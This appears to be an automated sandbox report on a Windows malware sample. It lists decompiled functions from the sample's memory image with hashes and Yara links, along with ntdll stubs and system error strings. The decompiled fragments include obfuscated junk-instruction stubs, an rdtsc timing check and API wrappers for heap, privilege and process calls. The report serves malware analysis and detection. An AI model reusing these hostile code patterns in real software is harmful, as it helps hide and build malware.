Instruction Fuzzy Hash: BC9002A122200503410571998414616410EA7E0242B91C021E1404590DC56588A17265

Uniqueness

Uniqueness Score: -1.00%

Function 01029840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102984A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4755b0bceb46d608b5f53a08c4899b407e3f54b1748b0771236c1861cd280057
Instruction ID: 27e7f997586d380aa8351c15ef4d1ddb306e1541e4ff8f0d5d20cbba9319dea0
Opcode Fuzzy Hash: 4755b0bceb46d608b5f53a08c4899b407e3f54b1748b0771236c1861cd280057
Instruction Fuzzy Hash: 31900261262046525545B1998404507410AB7E02827D1C012A1804950CC5669866E761

Uniqueness

Uniqueness Score: -1.00%

Function 01029860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102986A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de68b20f7e31871f23ef988875caefaadbd10bfa21f2507df5d64babeb468be6
Instruction ID: 0269b32bcb8943da6e62541dce365fa93da17aec66b3f0b31f23f751275f1b2d
Opcode Fuzzy Hash: de68b20f7e31871f23ef988875caefaadbd10bfa21f2507df5d64babeb468be6
Instruction Fuzzy Hash: B790027122100913D11161998504707010DA7D0282FD1C412A0814558DD6968962B261

Uniqueness

Uniqueness Score: -1.00%

Function 010298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010298FA

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c4523b252a9ac091e74fb3b69affed48e8084ad022a31be4e54fa06c7f0ee70
Instruction ID: bfa8fdb8e4f1e9375ae6f7c4cbd55992d2bbeb87acf3a0cd7365e287bc2878b8
Opcode Fuzzy Hash: 2c4523b252a9ac091e74fb3b69affed48e8084ad022a31be4e54fa06c7f0ee70
Instruction Fuzzy Hash: 9990026162100A02D10171998404616010EA7D0282FD1C022A1414555ECA6589A2B271

Uniqueness

Uniqueness Score: -1.00%

Function 01029710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102971A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 087670dffa616551ac3156bb03d226aae24c4dc06af3db0ee46dc84b20bf4092
Instruction ID: 33ec6b234fbe1335bb6dee9a784c9534ad38a7603769ba20ecf1be3e2738427d
Opcode Fuzzy Hash: 087670dffa616551ac3156bb03d226aae24c4dc06af3db0ee46dc84b20bf4092
Instruction Fuzzy Hash: 9A90027122100902D10065D994086460109A7E0342F91D011A5414555EC6A588A17271

Uniqueness

Uniqueness Score: -1.00%

Function 01029780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102978A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6721049343137d0675d399fa3985eb7d03fa8a1147dcfcf0e4b52f03562ae6c
Instruction ID: 60cca144ea13a1c44bf713ae0616f1ca0481dbd98e999abc1decca50abe212cf
Opcode Fuzzy Hash: b6721049343137d0675d399fa3985eb7d03fa8a1147dcfcf0e4b52f03562ae6c
Instruction Fuzzy Hash: 7690026923300502D1807199940860A0109A7D1243FD1D415A0405558CC95588796361

Uniqueness

Uniqueness Score: -1.00%

Function 010297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010297AA

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5ff5288345a3e53167c9d194835a6d415377ee9e373265a02be775d43cc5b44
Instruction ID: ada6d38c25df5381def28ef2eac5358349ae29dd26a4a19b1704bd73940ff84d
Opcode Fuzzy Hash: f5ff5288345a3e53167c9d194835a6d415377ee9e373265a02be775d43cc5b44
Instruction Fuzzy Hash: B290026132100503D140719994186064109F7E1342F91D011E0804554CD95588666362

Uniqueness

Uniqueness Score: -1.00%

Function 01029A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01029A0A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c8f6f2e489f447864e8105562a70cdc45d4a75fe5d1bc878e61345ead3dce5d
Instruction ID: e9332fc8bb0adc80e2e26c0e1dbefcd5aeae9eec41da453da6b6b496f8d7e4b1
Opcode Fuzzy Hash: 2c8f6f2e489f447864e8105562a70cdc45d4a75fe5d1bc878e61345ead3dce5d
Instruction Fuzzy Hash: CD90027122140902D1006199881470B0109A7D0343F91C011A1554555DC665886176B1

Uniqueness

Uniqueness Score: -1.00%

Function 01029A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01029A2A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67e5794ca0255eba8db9a95215e934dbd880bff82c748653c0e43c5bfbb6d582
Instruction ID: 143a7bf3bb937a0808796b936fbf7c5c97e898ea99567b1e7e93baefa4b60ead
Opcode Fuzzy Hash: 67e5794ca0255eba8db9a95215e934dbd880bff82c748653c0e43c5bfbb6d582
Instruction Fuzzy Hash: 2F90026162100542414071A9C8449064109BBE1252791C121A0D88550DC599887567A5

Uniqueness

Uniqueness Score: -1.00%

Function 01029A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01029A5A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24862cce38b614e33b80570cde9fa9861dc58fb5c18a70412d6af50b3b4c3219
Instruction ID: 3dd63de568deed24a6abd2691d5003fcd145389bfa706a0b607752b1d4141ecd
Opcode Fuzzy Hash: 24862cce38b614e33b80570cde9fa9861dc58fb5c18a70412d6af50b3b4c3219
Instruction Fuzzy Hash: 1890026123180542D20065A98C14B070109A7D0343F91C115A0544554CC95588716661

Uniqueness

Uniqueness Score: -1.00%

Function 01029660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102966A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
Instruction ID: 40df6e560410b834ef39bcc67f3213546e1b37eec6f129d181373a5b9c87354c
Opcode Fuzzy Hash: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
Instruction Fuzzy Hash: 2690027122100D02D1807199840464A0109A7D1342FD1C015A0415654DCA558A6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 010296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010296EA

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
Instruction ID: fcf73888d072860bb51d07e3df836e37d8bf1f9d8d878cc2e1b118a7a1a7090e
Opcode Fuzzy Hash: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
Instruction Fuzzy Hash: AB90027122108D02D1106199C40474A0109A7D0342F95C411A4814658DC6D588A17261

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* __esi;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B810( &_v284, 0x104);
						_t47 =  &_v284;
						E0041BE80( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(_t39, _t47, _t52, E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a9b
0x00409aa3
0x00409aa5
0x00409aaa
0x00409aaf
0x00409ac2
0x00409ac7
0x00409ad0
0x00409adc
0x00409ae8
0x00409aef
0x00409af4
0x00409af7
0x00409b00
0x00409b12
0x00409b17
0x00409b1c
0x00000000
0x00000000
0x00409b1e
0x00409b22
0x00000000
0x00000000
0x00409b24
0x00000000
0x00409b22
0x00409b26
0x00409b29
0x00409b2f
0x00409b31
0x00409b3c
0x00409b41
0x00409b44
0x00409b51
0x00409b5c
0x00409b5e
0x00409b64
0x00409b68
0x00409b6b
0x00409b6b
0x00409b72
0x00409b75
0x00409b7a
0x00409b87
0x00409ab6
0x00409ab6
0x00409ab6

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					goto L4;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836d
0x00000000
0x0040836d
0x0040836b
0x00000000
0x0040836b
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C1, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041A1C1(void* __eax, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				void* _v117;
				int _t18;
				void* _t34;

				asm("sahf");
				asm("insd");
				 *((intOrPtr*)(__edi - 8)) =  *((intOrPtr*)(__edi - 8)) + _t34;
				asm("scasb");
				asm("loopne 0xffffffe4");
				_t15 = _a4;
				E0041A960(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
				_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t18;
			}

0x0041a1c1
0x0041a1c2
0x0041a1c5
0x0041a1c8
0x0041a1cb
0x0041a1d3
0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 626c27c0bcc5cac7642100160d3b66512319750c662cb79356149fa5ec5eb874
Instruction ID: cb3b1f3d66f262ddaf4fde9776af361bbcfca386cce67ae9150c872f6a11a0fe
Opcode Fuzzy Hash: 626c27c0bcc5cac7642100160d3b66512319750c662cb79356149fa5ec5eb874
Instruction Fuzzy Hash: ECF0CDB6200204AFDB24DFA9DC81EEB77ADEF88310F108649F94D97242C631E8118BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a047
0x0041a05d
0x0041a061

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A3, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041A0A3(int _a4) {
				intOrPtr _v0;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t17;

				asm("sbb al, 0x66");
				asm("pushfd");
				_t17 = _t15 + 2;
				asm("stosb");
				 *(_t11 + 0x44) =  *(_t11 + 0x44) & 0x5511bf03;
				_t7 = _v0;
				_push(_t17);
				E0041A960(_t14, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}

0x0041a0a4
0x0041a0a7
0x0041a0a8
0x0041a0a9
0x0041a0aa
0x0041a0b3
0x0041a0bc
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 85ae343724c371f3073912367f700d2d1e8b9b88f7bdd131d9dbcaaa970644fc
Instruction ID: 06490d9692adf5dd9463b5d2afd852ab35f778d60dce2ed8b6ccca7fa34e84f8
Opcode Fuzzy Hash: 85ae343724c371f3073912367f700d2d1e8b9b88f7bdd131d9dbcaaa970644fc
Instruction Fuzzy Hash: FCE086715102147BD220DF58CCC5FD77B68DF48794F058458BE8C2F242C635EA028BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0b3
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0102967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01029694

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
Instruction ID: 243ba033f1fa935ed16f2785cc48698f715f6da06f3a2df43106aa4054c7ab8c
Opcode Fuzzy Hash: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
Instruction Fuzzy Hash: 9BB09B719114D5C9D651D7A4460C7177A4477D4745F56C061D1420641B4778C095F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0109B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The instruction at %p tried to %s , xrefs: 0109B4B6
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0109B476
Go determine why that thread has not released the critical section., xrefs: 0109B3C5
*** enter .exr %p for the exception record, xrefs: 0109B4F1
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0109B484
*** then kb to get the faulting stack, xrefs: 0109B51C
an invalid address, %p, xrefs: 0109B4CF
read from, xrefs: 0109B4AD, 0109B4B2
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B3D6
*** enter .cxr %p for the context, xrefs: 0109B50D
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0109B314
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0109B39B
*** Resource timeout (%p) in %ws:%s, xrefs: 0109B352
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0109B2F3
The instruction at %p referenced memory at %p., xrefs: 0109B432
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0109B2DC
<unknown>, xrefs: 0109B27E, 0109B2D1, 0109B350, 0109B399, 0109B417, 0109B48E
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0109B53F
This failed because of error %Ix., xrefs: 0109B446
*** An Access Violation occurred in %ws:%s, xrefs: 0109B48F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0109B323
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0109B47D
write to, xrefs: 0109B4A6
*** Inpage error in %ws:%s, xrefs: 0109B418
a NULL pointer, xrefs: 0109B4E0
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B38F
The resource is owned exclusively by thread %p, xrefs: 0109B374
The critical section is owned by thread %p., xrefs: 0109B3B9
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0109B305
The resource is owned shared by %d threads, xrefs: 0109B37E

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
Instruction ID: 456981eda588d109beb15d67dbb1126519e2c845e8440bd8a6eff6dae8def42e
Opcode Fuzzy Hash: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
Instruction Fuzzy Hash: 40810375A40200FFDF21AB09AC95EAF3B76FF56B62F498085F5841B252D761C401FAB2

Uniqueness

Uniqueness Score: -1.00%

Function 010A1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E010A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xfc48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x10d589c);
				E00FEB150("Heap error detected at %p (heap handle %p)\n",  *0x10d58a0);
				_t27 =  *0x10d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M010A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00FEB150("Error code: %d - %s\n",  *0x10d5898);
				_t113 =  *0x10d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter1: %p\n",  *0x10d58a4);
				}
